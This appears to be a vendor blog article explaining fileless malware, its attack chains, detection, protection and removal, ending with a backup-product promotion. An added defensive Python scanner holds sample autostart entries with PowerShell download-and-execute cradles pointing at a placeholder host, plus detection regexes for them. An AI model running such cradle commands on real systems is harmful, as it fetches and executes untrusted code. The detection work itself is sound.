Title: [Review] Fileless Malware: Definition/Detection/Affect/Removal
Description: What's fileless malware? How does fileless malware work? How to detect fileless malware? How to remove fileless malware? Get answers here!
URL: https://www.minitool.com/backup-tips/fileless-malware.html
Summary: This article, written by MiniTool, carefully reviews a type of non-file malicious software: fileless malware. After reading the content below, you will know the meaning, working strategy, detection, protection, and removal of fileless malware.
What Is Fileless Malware?
Fileless malware is a variant of computer malware that exists exclusively as a memory-based artifact, for example in random-access memory (RAM).
Fileless Malware Detection
What makes fileless infections so insidious is also what makes them so effective. It is sometimes said that fileless malware is "undetectable". This is not literally true; it just means that a fileless infection is usually not detected by antivirus, whitelisting, and other traditional endpoint security programs.
Tip: The Ponemon Institute says that fileless attacks are 10 times more likely to succeed than file-based attacks.
How to detect fileless malware? Fileless malware doesn't write anything about its activity to the computer's hard drives. Thus, it is very resistant to existing computer forensic strategies, which include hardware verification, pattern analysis, signature detection, time-stamping, file-based whitelisting, and so on.
Fileless malware leaves very little evidence that digital forensic investigators can use to identify illegitimate activity. As this kind of malware is designed to work in memory, it can persist on the operating system (OS) until the system is rebooted.
Fileless Malware Attacks
On Feb. 8, 2017, a report published by Kaspersky Lab's Global Research and Analysis Team, named "Fileless Attacks Against Enterprise Networks", covered fileless malware and its newest variants. The report says that fileless malware infected about 140 enterprise networks all over the world, including telecommunication enterprises, government organizations, and banks.
The report also shows how a fileless malware variant performs an attack against a target computer by relying on PowerShell scripts located within the Windows Registry. It leverages the common attack framework Metasploit, with supporting attack tools like Mimikatz and standard Windows utilities like NETSH and SC to assist with lateral movement.
This fileless malware was only found after a bank identified Metasploit Meterpreter code running in the physical memory of a central domain controller (DC).
Besides Kaspersky, many other computer security companies have also identified fileless malware, such as McAfee, Symantec, Trend Micro, Cybereason…
https://www.minitool.com/backup-tips/mcafee-vs-norton.html
Fileless Malware vs In-memory Malware
Sometimes, fileless malware is considered synonymous with in-memory malware, since both of them implement their main functions without writing data to hard drives during the whole life of their operation.
Therefore, some people think this variant is nothing new but a redefinition of the well-known "memory-resident virus", whose pedigree can be traced back to the birth of the Lehigh Virus (in the 1980s), which was developed by the originator of the term, Fred Cohen, and became famous with his paper on the topic.
However, to be exact, "fileless malware" is not a synonym of "in-memory malware", though they share the same execution environment: system memory. They do differ. The biggest difference between fileless malware and in-memory malware is the method of inception and prolongation.
Most malware's infection vector will write something to disk for itself to be executed. The origin of the malware can rely on external media devices like USB flash drives, mobile phones, attachments, side channels, browser drive-bys, etc.
Either in-memory malware or memory-resident malware has to have contact with the hard disks in the host computer in some form or another. Therefore, even employing the stealthiest anti-forensic methods, some form of infected residue will be left on the hard drives.
Yet, as for fileless malware, from inception until termination (usually by system reboot), it aims never to write its contents to hard drives. Fileless malware aims to reside in volatile OS areas including in-memory processes, the registry, as well as service areas.
https://www.minitool.com/news/windows-reboot-vs-reset-vs-restart-009.html
How Does Fileless Malware Work?
Fileless malware is an evolutionary strain of virus that has taken on a steady model of self-improvement or self-enhancement, with a drive toward clearly defined and focused attack scenarios. Its roots can be traced back to memory-resident (terminate-and-stay-resident) viral programs.
Once those programs were launched, they would reside in memory awaiting a system interrupt before gaining access to its control flow. Some fileless malware examples are The Dark Avenger, Number of the Beast, and Frodo.
Fileless Malware Common Technologies/Types
Memory-only malware
Registry-resident malware
Fileless ransomware
Exploit kits
Credential stealing
Hijacking native programs
Those technologies evolved by way of temporary memory-resident viruses; Monxla and Anthrax are famous for adopting those techniques. They took on their truer "fileless" nature by way of in-memory injected network worms or viruses like Slammer and Code Red.
Tip: More modern evolutionary fileless malware includes Poweliks, Duqu, Phasebot, and Stuxnet.
Fileless Malware Attack Process
Fileless attacks belong to the category of low-observable characteristics (LOC) attacks, a type of stealth attack that evades detection by most anti-malware and frustrates forensic analysis efforts. Instead of working in ordinary hard drive files, fileless malware operates in computer memory.
Without directly installing on the host or being contained in a file, fileless viruses go directly into system memory. By abusing PowerShell, they can access just about anything in Windows.
Below is an example process for a fileless attack:
Step 1. The user clicks on a link in a spam email.
Step 2. The website loads Flash and triggers an exploit.
Step 3. Shellcode runs PowerShell with a command line to download and execute the payload in memory only.
Step 4. The payload is downloaded for in-memory execution and reflectively loaded. The payload can perform exfiltration, damage, etc.
Step 5. An auto-start registry entry is created to invoke PowerShell with a command line.
Fileless Malware Spreading Process
Fileless attacks are typically used for lateral movement. They spread from one computer to another to obtain access to valuable data across the enterprise network.
To avoid suspicion, fileless malware goes into the inner parts of trusted and whitelisted processes such as PowerShell, wscript.exe, and cscript.exe, or the OS itself, to carry out malicious processes. Most automated malware scans can't detect command line changes. Although a trained analyst can identify those scripts, he usually does not know where to check for them.
Step 1. Gain access by remotely exploiting a vulnerability and using web scripting for remote access.
Step 2. Steal credentials in the same way.
Step 3. Maintain persistence by modifying the registry to create a backdoor.
Step 4. Steal data using the file system and built-in compression utilities. Then, upload data from the infected computer via FTP.
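As an added example (not code from the MiniTool article), the Python script below implements a defender's check for the persistence step that both attack chains above share: the auto-start registry entry that invokes PowerShell with a command line. It runs over a constructed set of Run-key values, decodes any -EncodedCommand payload, and flags the hidden-window, no-profile, encoded-command and download-cradle launch indicators; the entry names, sample values and indicator regexes are assumptions made here, not telemetry from the page.

```python
import base64
import re

# Constructed sample autostart values (name -> command line), modelled on a
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. Not real telemetry: the URLs
# use the reserved .invalid TLD and the encoded payload is built here only for the demo.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16le")).decode("ascii")
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "Updater": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
    "Helper": ("cmd.exe /c powershell -nop -w hidden -c "
               "\"IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))\""),
}

# Launch pattern from the attack chain above: PowerShell started with a hidden window,
# no profile, a base64 command, or a cradle that runs code fetched from the network.
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(
        r"(?:Invoke-Expression|\bIEX\b).*?(?:DownloadString|DownloadFile|WebClient|Invoke-WebRequest)", re.I),
}

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def scan_autostart_values(values: dict) -> dict:
    """Return {entry name: [indicator, ...]}; entries without PowerShell or hits are omitted."""
    findings = {}
    for name, cmd in values.items():
        if not POWERSHELL.search(cmd):
            continue
        hits = [label for label, rx in INDICATORS.items() if rx.search(cmd)]
        # The cradle is usually hidden inside the encoded command, so decode and rescan it.
        enc = INDICATORS["encoded_command"].search(cmd)
        if enc and INDICATORS["download_cradle"].search(decode_encoded_command(enc.group(1))):
            hits.append("download_cradle_in_encoded")
        if hits:
            findings[name] = hits
    return findings
```

On a live Windows host the same function can be fed the output of reading the Run and RunOnce keys for each user hive; a hit is a lead for analysis, not proof of infection, since administrators also script PowerShell from autostart entries.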
https://www.minitool.com/backup-tips/powershell-exe-virus.html
Fileless Malware Protection
How to avoid being infected by fileless malware? Since fileless malware is hard to detect and therefore more difficult to remove, you'd better stop it from successfully attacking your machine and keep it out of your computer. Then, how to achieve that?
#1 Don't Open Malicious Links and Files
Regarding the process of fileless attacks, one of the effective ways is to avoid clicking on unknown links from spam email or unsecured websites. Also, you'd better not open attachments from unknown senders.
#2 Keep Your Software Up to Date
Secondly, always keeping your programs at the newest version is another way to defend against fileless attacks, especially for Microsoft applications.
Tip: The Microsoft 365 suite contains security measures, and Windows Defender has also been upgraded to detect irregular PowerShell activity.
#3 Use Security Programs and a Firewall
If you can't ensure computer security by yourself, you should rely on security solutions, either system built-in programs or third-party ones. No matter which one you select, you should make sure that it builds an integrated and multi-layered approach that addresses the entire threat lifecycle. Thus, you can investigate every phase of the campaign before, during, and after an attack:
Be able to see and measure what is happening
Control the state of the targeted system
How to Remove Fileless Malware?
Fileless malware is a kind of malware that makes use of legitimate applications to infect computers. It relies on no files and leaves no footprint. Thus, it is difficult to detect and remove fileless malware.
#1 Rely on Powerful Security Software
Fileless malware has been effective in evading all but the most sophisticated security solutions, such as McAfee Endpoint Security, Norton 360, CrowdStrike, and Varonis. So, if you are unfortunately affected by fileless malware, you can choose one of them or another anti-malware product to help you remove fileless malware.
#2 Reboot Windows
Also, just as described in the former part of this article, you can try to reboot your system to get rid of fileless malware.
#3 Clean System Memory
If you choose to clean computer memory to do fileless malware removal, you need to be prepared for a fresh start. Actually, just resetting Windows to factory default settings or reinstalling the system can help you rebuild your memory.
Note: Before a factory reset or system reinstallation, do back up your crucial data.
https://www.minitool.com/news/how-to-clean-ram-021.html
How to Save Data from Lost During Fileless Malware Attack?
Since it is difficult to detect and delete fileless malware once it gets into your computer, you should take some actions while you are still unaffected by fileless attacks. Besides the methods to avoid being infected by fileless malware mentioned above, another important task you need to complete is to back up the vital files on your computer.
Once you have a backup of important files, even if you lose them while removing fileless malware by a computer hard reset, you can still restore them from the backup image. To create a backup of crucial items, you are recommended to rely on a professional and reliable program such as MiniTool ShadowMaker.
Step 1. Download and install MiniTool ShadowMaker on your computer.
Step 2. Open it and click Keep Trial if you are asked to buy.
Step 3. Click Backup in the top menu of the main interface.
Step 4. Click the Source module in the Backup tab and select which files or programs you want to back up. You can also choose to back up the system, a partition/volume, or a whole hard drive.
Step 5. Click the Destination module to select where you'd like to store the backup image file. External storage space is recommended.
Step 6. Preview the backup process and confirm it by clicking the Back up Now button.
[Image: MiniTool ShadowMaker Backup Files]
It will pop up asking for your confirmation again; just approve it. Then, wait until it finishes, or you can switch to other business while it is processing.
That is all about fileless malware. If you want to learn more related to fileless malware or attacks, you can view the FAQ below or search on this website; if you have any idea about fileless malware or other viruses, you can leave a comment below; if you come across any problem while using MiniTool ShadowMaker, feel free to contact us via support@minitool.com.
Fileless Malware FAQ
Is PowerShell safe?
PowerShell is generally a secure application that is developed and maintained by Microsoft. It is becoming safer with continuous updates. When set to its AllSigned execution policy, only scripts signed by an identifiable author are able to run in PowerShell. Anyhow, PowerShell is much safer than many other programs.
Should I disable PowerShell?
No, you are not recommended to disable PowerShell. Disabling PowerShell reduces the capability to monitor and manage your system environment and makes your computer more vulnerable to hackers or malware.
What is sophisticated malware?
Sophisticated malware attacks usually feature the use of a command-and-control server that allows threat actors to communicate with the attacked OS, exfiltrate crucial data, and even control the infected computer remotely.